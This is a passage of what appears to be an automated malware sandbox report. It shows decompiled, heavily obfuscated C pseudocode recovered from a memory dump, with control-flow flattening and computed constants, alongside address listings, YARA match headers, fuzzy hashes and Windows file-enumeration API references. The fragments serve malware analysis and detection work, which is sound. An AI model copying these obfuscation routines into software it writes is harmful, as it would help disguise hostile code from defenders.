								_v8 = _t271;
								if(_t271 != 0) {
									_t277 = 0x5cf5989;
									continue;
								}
							} else {
								if(_t277 == 0x8685116) {
									_t273 = E012162D2( &_v4, _v100, _t298, _v60, _v64, _v104, _v32, _v68, _t277,  *_t300, _v36, _v72, _t277,  *((intOrPtr*)(_t300 + 4)),  *((intOrPtr*)( *0x1235220 + 0x44)), _v108);
									_t309 = _t309 + 0x38;
									if(_t273 == _v28) {
										_t277 = 0x7dcf113;
										continue;
									}
								} else {
									if(_t277 != 0xb0e3219) {
										goto L14;
									} else {
										E0121AE43(_v8, _v76, _v40);
									}
								}
							}
						}
						L17:
						return _t298;
					}
					_t277 = 0x8685116;
					L14:
				} while (_t277 != 0x9ca187e);
				goto L17;
			}














































                          0x01215450
                          0x0121545a
                          0x0121545b
                          0x01215462
                          0x01215464
                          0x0121546b
                          0x0121546c
                          0x0121546d
                          0x01215472
                          0x0121547a
                          0x0121547d
                          0x01215487
                          0x0121548f
                          0x01215491
                          0x01215499
                          0x012154a4
                          0x012154a9
                          0x012154af
                          0x012154b7
                          0x012154bf
                          0x012154cb
                          0x012154d0
                          0x012154d6
                          0x012154de
                          0x012154e6
                          0x012154ee
                          0x012154f3
                          0x012154f8
                          0x01215500
                          0x01215508
                          0x01215510
                          0x01215518
                          0x01215520
                          0x0121552a
                          0x0121552b
                          0x0121552f
                          0x01215534
                          0x0121553c
                          0x01215544
                          0x0121554c
                          0x01215554
                          0x0121555c
                          0x0121556a
                          0x0121556e
                          0x01215573
                          0x0121557b
                          0x01215583
                          0x0121558b
                          0x01215593
                          0x0121559b
                          0x012155a3
                          0x012155ab
                          0x012155b3
                          0x012155b8
                          0x012155c0
                          0x012155c8
                          0x012155d0
                          0x012155d8
                          0x012155e0
                          0x012155e5
                          0x012155ed
                          0x012155f5
                          0x012155fd
                          0x01215602
                          0x0121560a
                          0x01215614
                          0x0121561c
                          0x0121562a
                          0x0121562f
                          0x01215635
                          0x0121563d
                          0x01215645
                          0x0121564d
                          0x01215655
                          0x0121565d
                          0x01215665
                          0x0121566f
                          0x01215672
                          0x01215676
                          0x0121567e
                          0x01215686
                          0x0121568b
                          0x01215693
                          0x0121569b
                          0x012156a3
                          0x012156b3
                          0x012156b7
                          0x012156bf
                          0x012156cc
                          0x012156cd
                          0x012156d1
                          0x012156d9
                          0x012156de
                          0x012156e6
                          0x012156ee
                          0x012156f6
                          0x012156fe
                          0x01215711
                          0x01215715
                          0x0121571d
                          0x01215725
                          0x0121572d
                          0x01215732
                          0x0121573a
                          0x01215742
                          0x0121574a
                          0x01215752
                          0x0121575a
                          0x0121575f
                          0x01215767
                          0x0121576f
                          0x01215779
                          0x0121577d
                          0x01215782
                          0x0121578a
                          0x01215792
                          0x0121579a
                          0x012157a2
                          0x012157aa
                          0x012157aa
                          0x012157b8
                          0x012158cd
                          0x012158d2
                          0x012158d9
                          0x012158fe
                          0x01215900
                          0x01215905
                          0x012158db
                          0x012158db
                          0x00000000
                          0x012158db
                          0x012157be
                          0x012157c4
                          0x0121585f
                          0x01215860
                          0x01215868
                          0x0121586d
                          0x01215870
                          0x01215876
                          0x0121587c
                          0x00000000
                          0x0121587c
                          0x012157ca
                          0x012157d0
                          0x01215833
                          0x01215838
                          0x0121583f
                          0x01215845
                          0x00000000
                          0x01215845
                          0x012157d2
                          0x012157d8
                          0x00000000
                          0x012157de
                          0x012157ea
                          0x012157ef
                          0x012157d8
                          0x012157d0
                          0x012157c4
                          0x01215908
                          0x01215911
                          0x01215911
                          0x012158e5
                          0x012158ea
                          0x012158ea
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;o$S\K$lS$}xV$&Q
                          • API String ID: 0-2347710372
                          • Opcode ID: fc266f0ec6ccc515fb43a9d894b5d01feac5df9bb9aaab0c90a11ee0dc447430
                          • Instruction ID: cb62947e7454898eed3be11efdc15a638045ff3719e5d0d6770f8e52eb9ccf43
                          • Opcode Fuzzy Hash: fc266f0ec6ccc515fb43a9d894b5d01feac5df9bb9aaab0c90a11ee0dc447430
                          • Instruction Fuzzy Hash: 48C11E711193819FD369CF66C94A91BFBF1FBD5B08F50891CF6A686220C3B28949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012228D5, Relevance: 6.5, Strings: 5, Instructions: 228COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E012228D5(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t201;
				signed int _t227;
				void* _t229;
				void* _t236;
				char* _t237;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int* _t287;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t201);
				_v140 = 0x228371;
				_t287 =  &(( &_v204)[3]);
				_t236 = 0xb47c5a6;
				_push("true");
				_pop(_t272);
				_v140 = _v140 / _t272;
				_v140 = _v140 ^ 0x000cd4c9;
				_v148 = 0xe38f0d;
				_v148 = _v148 | 0x53818e9f;
				_v148 = _v148 ^ 0x53e5adca;
				_v164 = 0x925061;
				_t273 = 0x60;
				_v164 = _v164 / _t273;
				_v164 = _v164 >> 0xc;
				_v164 = _v164 ^ 0x000a5a99;
				_v188 = 0x4724d3;
				_v188 = _v188 << 0xf;
				_v188 = _v188 + 0xffffc3e3;
				_t274 = 0x2d;
				_v188 = _v188 / _t274;
				_v188 = _v188 ^ 0x03459787;
				_v180 = 0xef69e6;
				_v180 = _v180 >> 3;
				_v180 = _v180 >> 0xa;
				_v180 = _v180 ^ 0x00003c97;
				_v152 = 0x98c097;
				_v152 = _v152 << 2;
				_t275 = 0x29;
				_v152 = _v152 / _t275;
				_v152 = _v152 ^ 0x000f846e;
				_v172 = 0x77ec7a;
				_v172 = _v172 + 0xffff635c;
				_t276 = 0x2e;
				_v172 = _v172 / _t276;
				_v172 = _v172 ^ 0x0000e727;
				_v144 = 0x6ceac0;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x756cd0b2;
				_v136 = 0x39e462;
				_t277 = 0x7b;
				_v136 = _v136 / _t277;
				_v136 = _v136 ^ 0x0009a068;
				_v192 = 0xbb0482;
				_v192 = _v192 << 4;
				_v192 = _v192 << 8;
				_v192 = _v192 << 7;
				_v192 = _v192 ^ 0x241ddc74;
				_v200 = 0x621571;
				_t278 = 0x50;
				_v200 = _v200 / _t278;
				_t279 = 0x45;
				_v200 = _v200 * 0x3a;
				_v200 = _v200 / _t279;
				_v200 = _v200 ^ 0x00011fb2;
				_v156 = 0x83e69d;
				_v156 = _v156 << 8;
				_t280 = 0x5d;
				_v156 = _v156 / _t280;
				_v156 = _v156 ^ 0x016021fe;
				_v204 = 0xd9a8d;
				_v204 = _v204 >> 0xf;
				_v204 = _v204 >> 0xe;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x00011a2f;
				_v196 = 0xcda1a4;
				_v196 = _v196 + 0x40ea;
				_t281 = 0x1a;
				_v196 = _v196 / _t281;
				_v196 = _v196 + 0x92d1;
				_v196 = _v196 ^ 0x00012803;
				_v184 = 0x871beb;
				_v184 = _v184 | 0xcce9b8bd;
				_v184 = _v184 ^ 0xe0907a69;
				_t282 = 0x61;
				_v184 = _v184 * 0x2a;
				_v184 = _v184 ^ 0x4cfdea65;
				_v176 = 0x11575;
				_v176 = _v176 + 0xffff1c11;
				_v176 = _v176 >> 0xf;
				_v176 = _v176 ^ 0x0009f36c;
				_v160 = 0x76fa28;
				_v160 = _v160 / _t282;
				_t227 = _v160 * 0x46;
				_v160 = _t227;
				_v160 = _v160 ^ 0x005d8692;
				_v168 = 0x81c840;
				_v168 = _v168 + 0xffffbfbf;
				_v168 = _v168 | 0xf8839c20;
				_v168 = _v168 ^ 0xf880f8a6;
				do {
					while(_t236 != 0x4c454f1) {
						if(_t236 == 0x984a531) {
							_v132 = 0x80;
							_t227 = E01219022(_v140,  &_v132,  &_v128, _v148, _v164);
							_t287 =  &(_t287[3]);
							_t236 = 0x4c454f1;
							continue;
						}
						if(_t236 == 0xb47c5a6) {
							_t236 = 0x984a531;
							continue;
						}
						_t294 = _t236 - 0xf70f2ef;
						if(_t236 != 0xf70f2ef) {
							goto L19;
						}
						_push(_v172);
						_push(_v152);
						_push(_v180);
						_t229 = E0121387F(_v188, 0x1211170);
						E01232C35(_v200, _t294, _v156, _v144, _v204, _t229, _v196,  &_v128, E01214B81(), _a4);
						return E0122629F(_v184, _t229, _v176, _v160, _v168);
					}
					__eflags = _v128;
					_t237 =  &_v128;
					if(_v128 == 0) {
						L18:
						_t236 = 0xf70f2ef;
						goto L19;
					} else {
						goto L10;
					}
					do {
						L10:
						_t227 =  *_t237;
						__eflags = _t227 - 0x30;
						if(_t227 < 0x30) {
							L12:
							__eflags = _t227 - 0x61;
							if(_t227 < 0x61) {
								L14:
								__eflags = _t227 - 0x41;
								if(_t227 < 0x41) {
									L16:
									 *_t237 = 0x58;
									goto L17;
								}
								__eflags = _t227 - 0x5a;
								if(_t227 <= 0x5a) {
									goto L17;
								}
								goto L16;
							}
							__eflags = _t227 - 0x7a;
							if(_t227 <= 0x7a) {
								goto L17;
							}
							goto L14;
						}
						__eflags = _t227 - 0x39;
						if(_t227 <= 0x39) {
							goto L17;
						}
						goto L12;
						L17:
						_t237 = _t237 + 1;
						__eflags =  *_t237;
					} while ( *_t237 != 0);
					goto L18;
					L19:
					__eflags = _t236 - 0x1d6f80;
				} while (_t236 != 0x1d6f80);
				return _t227;
			}








































                          0x012228df
                          0x012228e6
                          0x012228e7
                          0x012228e8
                          0x012228ed
                          0x012228f5
                          0x01222903
                          0x01222905
                          0x01222907
                          0x0122290c
                          0x01222912
                          0x0122291a
                          0x01222922
                          0x0122292a
                          0x01222932
                          0x0122293e
                          0x01222943
                          0x01222949
                          0x0122294e
                          0x01222956
                          0x0122295e
                          0x01222963
                          0x0122296f
                          0x01222974
                          0x0122297a
                          0x01222982
                          0x0122298a
                          0x0122298f
                          0x01222994
                          0x0122299c
                          0x012229a4
                          0x012229ad
                          0x012229b2
                          0x012229b8
                          0x012229c0
                          0x012229c8
                          0x012229d4
                          0x012229d9
                          0x012229df
                          0x012229e7
                          0x012229ef
                          0x012229f4
                          0x012229fc
                          0x01222a08
                          0x01222a0b
                          0x01222a0f
                          0x01222a17
                          0x01222a1f
                          0x01222a24
                          0x01222a29
                          0x01222a2e
                          0x01222a36
                          0x01222a4b
                          0x01222a50
                          0x01222a60
                          0x01222a63
                          0x01222a6f
                          0x01222a73
                          0x01222a7b
                          0x01222a83
                          0x01222a8c
                          0x01222a91
                          0x01222a97
                          0x01222a9f
                          0x01222aa7
                          0x01222aac
                          0x01222ab1
                          0x01222ab6
                          0x01222abe
                          0x01222ac6
                          0x01222ad2
                          0x01222ad7
                          0x01222add
                          0x01222ae5
                          0x01222aed
                          0x01222af5
                          0x01222afd
                          0x01222b0a
                          0x01222b0b
                          0x01222b0f
                          0x01222b17
                          0x01222b1f
                          0x01222b27
                          0x01222b2c
                          0x01222b34
                          0x01222b47
                          0x01222b4b
                          0x01222b50
                          0x01222b54
                          0x01222b5c
                          0x01222b64
                          0x01222b6c
                          0x01222b74
                          0x01222b7c
                          0x01222b7c
                          0x01222b86
                          0x01222c24
                          0x01222c39
                          0x01222c3e
                          0x01222c41
                          0x00000000
                          0x01222c41
                          0x01222b8e
                          0x01222c15
                          0x00000000
                          0x01222c15
                          0x01222b94
                          0x01222b96
                          0x00000000
                          0x00000000
                          0x01222b9c
                          0x01222ba5
                          0x01222ba9
                          0x01222bb1
                          0x01222beb
                          0x00000000
                          0x01222c07
                          0x01222c48
                          0x01222c4d
                          0x01222c51
                          0x01222c76
                          0x01222c76
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01222c53
                          0x01222c53
                          0x01222c53
                          0x01222c55
                          0x01222c57
                          0x01222c5d
                          0x01222c5d
                          0x01222c5f
                          0x01222c65
                          0x01222c65
                          0x01222c67
                          0x01222c6d
                          0x01222c6d
                          0x00000000
                          0x01222c6d
                          0x01222c69
                          0x01222c6b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01222c6b
                          0x01222c61
                          0x01222c63
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01222c63
                          0x01222c59
                          0x01222c5b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01222c70
                          0x01222c70
                          0x01222c71
                          0x01222c71
                          0x00000000
                          0x01222c78
                          0x01222c78
                          0x01222c78
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '$b9$zw$@$i
                          • API String ID: 0-3000951012
                          • Opcode ID: eca309accbb3c7b75bfdcc1fc93908ae44d8abcaad40117675d51ac4e61f6f9a
                          • Instruction ID: d88ea765236f485429797d0c4d4f9a8a379e96d08515e242bd0060facb730056
                          • Opcode Fuzzy Hash: eca309accbb3c7b75bfdcc1fc93908ae44d8abcaad40117675d51ac4e61f6f9a
                          • Instruction Fuzzy Hash: 01A15572519311AFD314CF6AC94955FBBE2EBC5B58F00891DF2959A260C3B5CA09CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012252D1, Relevance: 6.5, Strings: 5, Instructions: 201COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E012252D1() {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t169;
				signed int _t174;
				void* _t177;
				void* _t201;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				intOrPtr* _t216;
				signed int _t217;
				signed int* _t218;

				_t218 =  &_v80;
				_v16 = 0x48627d;
				asm("stosd");
				_t177 = 0x5a72887;
				_t209 = 0x25;
				asm("stosd");
				asm("stosd");
				_v32 = 0x86523e;
				_t208 = 0;
				_v32 = _v32 << 8;
				_v32 = _v32 ^ 0x86533e00;
				_v72 = 0xa4c58f;
				_v72 = _v72 << 0xd;
				_v72 = _v72 << 3;
				_v72 = _v72 >> 2;
				_v72 = _v72 ^ 0x316cc03f;
				_v68 = 0xc0722d;
				_v68 = _v68 << 0xe;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0xe1d51454;
				_v68 = _v68 ^ 0xe1e56f44;
				_v28 = 0x52fba7;
				_v28 = _v28 | 0xe9f43a53;
				_v28 = _v28 ^ 0xe9f6576b;
				_v76 = 0x5e3b0e;
				_v76 = _v76 / _t209;
				_v76 = _v76 >> 6;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0x0a204189;
				_v36 = 0x9bf292;
				_t210 = 0x1a;
				_v36 = _v36 / _t210;
				_v36 = _v36 ^ 0x0008bac2;
				_v80 = 0xb159ba;
				_v80 = _v80 >> 7;
				_v80 = _v80 + 0x8818;
				_v80 = _v80 | 0x29819ce4;
				_v80 = _v80 ^ 0x29831e5d;
				_v40 = 0xa3484f;
				_v40 = _v40 << 3;
				_t211 = 0x38;
				_v40 = _v40 / _t211;
				_v40 = _v40 ^ 0x001ba9bc;
				_v44 = 0x2905de;
				_t212 = 0x74;
				_v44 = _v44 / _t212;
				_v44 = _v44 ^ 0xdc446da0;
				_v44 = _v44 ^ 0xdc452432;
				_v60 = 0xd24c03;
				_t213 = 0x1b;
				_v60 = _v60 / _t213;
				_v60 = _v60 + 0xdf29;
				_v60 = _v60 << 0x10;
				_v60 = _v60 ^ 0xa91741d9;
				_v64 = 0x106703;
				_v64 = _v64 >> 5;
				_v64 = _v64 >> 0xd;
				_t169 = 0x7768a1b;
				_v64 = _v64 + 0x8186;
				_v64 = _v64 ^ 0x0009841a;
				_v48 = 0x2748f1;
				_v48 = _v48 << 0xb;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x03ac4828;
				_v52 = 0x62e233;
				_v52 = _v52 + 0xffff6348;
				_v52 = _v52 + 0x29a6;
				_v52 = _v52 ^ 0x0067486f;
				_v20 = 0xd2d4ad;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x0009efcc;
				_t214 = _v20;
				_t176 = _v20;
				_t217 = _v20;
				_v24 = 0xfa04;
				_v24 = _v24 | 0xaf6f42b7;
				_v24 = _v24 ^ 0xaf6dd9e2;
				_v56 = 0xa2a22c;
				_v56 = _v56 ^ 0xc96b8489;
				_v56 = _v56 ^ 0x5a0a175c;
				_v56 = _v56 | 0xf19d30fd;
				_v56 = _v56 ^ 0xf3dd9975;
				while(1) {
					L1:
					_t201 = 0x5c;
					while(_t177 != 0x5a72887) {
						if(_t177 == 0x64aa617) {
							_t216 =  *0x1235218 + 0x234;
							while( *_t216 != _t201) {
								_t216 = _t216 + 2;
							}
							_t214 = _t216 + 2;
							_t177 = 0xf9ac19d;
							goto L13;
						} else {
							if(_t177 == _t169) {
								E012329F5(_t217, _v40, _v44, _v60);
								_t208 =  !=  ? 1 : _t208;
								_t177 = 0xaef5a2c;
								goto L12;
							} else {
								if(_t177 == 0xaef5a2c) {
									E0121EDC5(_v64, _t217, _v48, _v52);
									_t177 = 0xc5d78ba;
									goto L12;
								} else {
									if(_t177 == 0xc5d78ba) {
										E0121EDC5(_v20, _t176, _v24, _v56);
									} else {
										if(_t177 == 0xf9ac19d) {
											_t174 = E0121ACDB(_t177, _v68, _v28, _v72, _t177, _v76);
											_t176 = _t174;
											_t218 =  &(_t218[4]);
											if(_t174 != 0) {
												_t177 = 0xfda8980;
												L12:
												_t201 = 0x5c;
												L13:
												_t169 = 0x7768a1b;
												continue;
											}
										} else {
											if(_t177 != 0xfda8980) {
												L21:
												if(_t177 != 0x7748c14) {
													continue;
												} else {
												}
											} else {
												_t217 = E0121A323(_v32, _t214, _t176, _v36, _v80);
												_t218 =  &(_t218[3]);
												_t169 = 0x7768a1b;
												_t177 =  !=  ? 0x7768a1b : 0xc5d78ba;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t208;
					}
					_t177 = 0x64aa617;
					goto L21;
				}
			}



































                          0x012252d1
                          0x012252d4
                          0x012252e8
                          0x012252e9
                          0x012252f0
                          0x012252f3
                          0x012252f4
                          0x012252f5
                          0x012252fd
                          0x012252ff
                          0x01225304
                          0x0122530c
                          0x01225314
                          0x01225319
                          0x0122531e
                          0x01225323
                          0x0122532b
                          0x01225333
                          0x01225338
                          0x0122533d
                          0x01225345
                          0x0122534d
                          0x01225355
                          0x0122535d
                          0x01225365
                          0x01225375
                          0x01225379
                          0x0122537e
                          0x01225383
                          0x0122538b
                          0x01225397
                          0x0122539c
                          0x012253a2
                          0x012253aa
                          0x012253b2
                          0x012253b7
                          0x012253bf
                          0x012253c7
                          0x012253cf
                          0x012253d7
                          0x012253e0
                          0x012253e5
                          0x012253eb
                          0x012253f3
                          0x012253ff
                          0x01225404
                          0x0122540a
                          0x01225412
                          0x0122541a
                          0x01225426
                          0x01225429
                          0x0122542d
                          0x01225435
                          0x0122543a
                          0x01225442
                          0x0122544a
                          0x0122544f
                          0x01225454
                          0x01225459
                          0x01225461
                          0x01225469
                          0x01225471
                          0x01225476
                          0x0122547b
                          0x01225483
                          0x0122548b
                          0x01225493
                          0x0122549b
                          0x012254a3
                          0x012254ab
                          0x012254b0
                          0x012254b8
                          0x012254bc
                          0x012254c0
                          0x012254c4
                          0x012254cc
                          0x012254d4
                          0x012254dc
                          0x012254e4
                          0x012254ec
                          0x012254f4
                          0x012254fc
                          0x01225504
                          0x01225504
                          0x01225506
                          0x01225507
                          0x01225519
                          0x012255f4
                          0x012255ff
                          0x012255fc
                          0x012255fc
                          0x01225604
                          0x01225607
                          0x00000000
                          0x0122551f
                          0x01225521
                          0x012255d8
                          0x012255e4
                          0x012255e7
                          0x00000000
                          0x01225527
                          0x0122552d
                          0x012255bc
                          0x012255c3
                          0x00000000
                          0x0122552f
                          0x01225535
                          0x0122562f
                          0x0122553b
                          0x01225541
                          0x0122558a
                          0x0122558f
                          0x01225591
                          0x01225596
                          0x0122559c
                          0x012255a1
                          0x012255a3
                          0x012255a4
                          0x012255a4
                          0x00000000
                          0x012255a4
                          0x01225543
                          0x01225549
                          0x01225613
                          0x01225619
                          0x00000000
                          0x00000000
                          0x0122561f
                          0x0122554f
                          0x01225563
                          0x01225565
                          0x0122556f
                          0x01225574
                          0x00000000
                          0x01225574
                          0x01225549
                          0x01225541
                          0x01225535
                          0x0122552d
                          0x01225521
                          0x0122563f
                          0x0122563f
                          0x0122560e
                          0x00000000
                          0x0122560e

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,Z$,Z$Do$oHg$}bH
                          • API String ID: 0-2022688335
                          • Opcode ID: 392cb0a4e756d3e0e6a8b9f4a36bc545f5f80527aabd1245b0431193c82c3bc2
                          • Instruction ID: 3ec15a7952ad62e1fc89d33c7021afbaea287b2ebc96063f86d14a911f0bf766
                          • Opcode Fuzzy Hash: 392cb0a4e756d3e0e6a8b9f4a36bc545f5f80527aabd1245b0431193c82c3bc2
                          • Instruction Fuzzy Hash: B9818771128301AFD768CE25D48945FBBF2FBD8758F00891DF69696260C7B28949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01218D80, Relevance: 6.4, Strings: 5, Instructions: 147COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01218D80() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t142;
				void* _t149;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				short* _t171;
				signed int* _t174;

				_t174 =  &_v568;
				_v560 = 0x2934b9;
				_v560 = _v560 >> 0xf;
				_t149 = 0x218b646;
				_t167 = 0x75;
				_v560 = _v560 / _t167;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x00026197;
				_v548 = 0xbabc11;
				_v548 = _v548 + 0xffff3d8a;
				_v548 = _v548 | 0x67dd507d;
				_t168 = 0x3f;
				_v548 = _v548 / _t168;
				_v548 = _v548 ^ 0x01adaa19;
				_v528 = 0xf8deee;
				_v528 = _v528 << 9;
				_t169 = 0x78;
				_v528 = _v528 / _t169;
				_v528 = _v528 ^ 0x020b2598;
				_v556 = 0x6e4a2b;
				_t39 =  &_v556; // 0x6e4a2b
				_t170 = 0x72;
				_v556 =  *_t39 * 0x46;
				_v556 = _v556 + 0xfffff210;
				_v556 = _v556 << 6;
				_v556 = _v556 ^ 0x8a01d115;
				_v544 = 0xdbc62a;
				_v544 = _v544 + 0x16bb;
				_v544 = _v544 | 0xdeafacd7;
				_v544 = _v544 << 0xf;
				_v544 = _v544 ^ 0xfe71c956;
				_v564 = 0xfc7959;
				_v564 = _v564 / _t170;
				_v564 = _v564 ^ 0x0970e831;
				_v564 = _v564 + 0xffff05d1;
				_v564 = _v564 ^ 0x097f8c27;
				_v532 = 0x83be6c;
				_v532 = _v532 ^ 0x142eb0a8;
				_v532 = _v532 + 0xffff95e2;
				_v532 = _v532 ^ 0x14a172dc;
				_v568 = 0xa04470;
				_v568 = _v568 >> 4;
				_v568 = _v568 << 4;
				_t142 = _v568 * 0x72;
				_v568 = _t142;
				_v568 = _v568 ^ 0x4753dfca;
				_v536 = 0xe1bfcc;
				_v536 = _v536 + 0x574a;
				_v536 = _v536 + 0xffff1de1;
				_v536 = _v536 ^ 0x00e07fda;
				_v524 = 0x790602;
				_v524 = _v524 + 0xffffa1b4;
				_v524 = _v524 ^ 0x007a526f;
				_t171 = _v524;
				_v552 = 0xb04934;
				_v552 = _v552 ^ 0x54c37117;
				_v552 = _v552 | 0xf1b33cc4;
				_v552 = _v552 + 0xffffd9e6;
				_v552 = _v552 ^ 0xf5fb445d;
				L1:
				while(_t149 != 0xbab7d8) {
					if(_t149 == 0x218b646) {
						_t149 = 0xbab7d8;
						continue;
					}
					if(_t149 == 0x8349730) {
						__eflags =  *0x1235218 + 0x234;
						return E01222EEF(_v568, _v536, _v524,  *0x1235218 + 0x234, _t171, _v552);
					}
					if(_t149 != 0xb027a71) {
						L15:
						__eflags = _t149 - 0x947b83;
						if(__eflags != 0) {
							continue;
						}
						return _t142;
					}
					_v540 = 0x52e5be;
					_v540 = _v540 + 0xffffa482;
					_v540 = _v540 + 0xffffe10a;
					_v540 = _v540 ^ 0x00526b48;
					_t117 =  &_v544; // 0x526b48
					_t171 =  &_v520 + E0121B01D( *_t117, _v564,  &_v520, _v532) * 2;
					while(1) {
						_t142 =  &_v520;
						if(_t171 <= _t142) {
							break;
						}
						__eflags =  *_t171 - 0x5c;
						if( *_t171 != 0x5c) {
							L8:
							_t171 = _t171 - 2;
							__eflags = _t171;
							continue;
						}
						_t121 =  &_v540;
						 *_t121 = _v540 - 1;
						__eflags =  *_t121;
						if( *_t121 == 0) {
							__eflags = _t171;
							L12:
							_t149 = 0x8349730;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t142 = E0122855C( &_v520, _v560, __eflags, _v548, _v528, _t149, _v556);
				_t174 =  &(_t174[4]);
				_t149 = 0xb027a71;
				goto L15;
			}
























                          0x01218d80
                          0x01218d86
                          0x01218d90
                          0x01218d95
                          0x01218da4
                          0x01218da9
                          0x01218daf
                          0x01218db9
                          0x01218dc6
                          0x01218dd3
                          0x01218ddb
                          0x01218de7
                          0x01218dec
                          0x01218df2
                          0x01218dfa
                          0x01218e02
                          0x01218e0b
                          0x01218e10
                          0x01218e16
                          0x01218e1e
                          0x01218e26
                          0x01218e2b
                          0x01218e2c
                          0x01218e30
                          0x01218e38
                          0x01218e3d
                          0x01218e45
                          0x01218e4d
                          0x01218e55
                          0x01218e5d
                          0x01218e62
                          0x01218e6a
                          0x01218e78
                          0x01218e7c
                          0x01218e84
                          0x01218e8c
                          0x01218e94
                          0x01218e9c
                          0x01218ea4
                          0x01218eac
                          0x01218eb4
                          0x01218ebc
                          0x01218ec1
                          0x01218ec6
                          0x01218ecb
                          0x01218ecf
                          0x01218ed7
                          0x01218edf
                          0x01218ee7
                          0x01218eef
                          0x01218ef7
                          0x01218eff
                          0x01218f07
                          0x01218f0f
                          0x01218f13
                          0x01218f1b
                          0x01218f23
                          0x01218f2b
                          0x01218f33
                          0x00000000
                          0x01218f3b
                          0x01218f49
                          0x01218fbf
                          0x00000000
                          0x01218fbf
                          0x01218f4d
                          0x01218ffd
                          0x00000000
                          0x01219014
                          0x01218f55
                          0x01218fe5
                          0x01218fe5
                          0x01218feb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01218feb
                          0x01218f5b
                          0x01218f67
                          0x01218f6f
                          0x01218f77
                          0x01218f87
                          0x01218f97
                          0x01218fab
                          0x01218fab
                          0x01218fb1
                          0x00000000
                          0x00000000
                          0x01218f9c
                          0x01218fa0
                          0x01218fa8
                          0x01218fa8
                          0x01218fa8
                          0x00000000
                          0x01218fa8
                          0x01218fa2
                          0x01218fa2
                          0x01218fa2
                          0x01218fa6
                          0x01218fb5
                          0x01218fb8
                          0x01218fb8
                          0x00000000
                          0x01218fb8
                          0x00000000
                          0x01218fa6
                          0x00000000
                          0x01218fb3
                          0x01218fdb
                          0x01218fe0
                          0x01218fe3
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +Jn?$1p$HkRx$JW$oRz
                          • API String ID: 0-927109725
                          • Opcode ID: 1b572e06654ec1503665860b2a0fa50914c69d0f7a173533a0402267d3e5d464
                          • Instruction ID: 354c89270dfd8a6255252a2431300b2312e71e227708d5fd324865b85f73566e
                          • Opcode Fuzzy Hash: 1b572e06654ec1503665860b2a0fa50914c69d0f7a173533a0402267d3e5d464
                          • Instruction Fuzzy Hash: 886153725183029FC354CE25C88945FBBF2FBD4368F408A1DF69666264D3B49A4ACF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250AA5, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileExW.KERNEL32(?,?,?), ref: 6F250AC8
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F250BBC
                          • FindClose.KERNEL32(00000000,?,?,?,?,?), ref: 6F250C2E
                          • FindClose.KERNEL32(00000000,?,?,?,?,?), ref: 6F250BFB
                            • Part of subcall function 6F2505C3: HeapFree.KERNEL32(00000000,00000000,?,6F254F77,?,00000000,?,?,6F254F9C,?,00000007,?,?,6F253037,?,?), ref: 6F2505D9
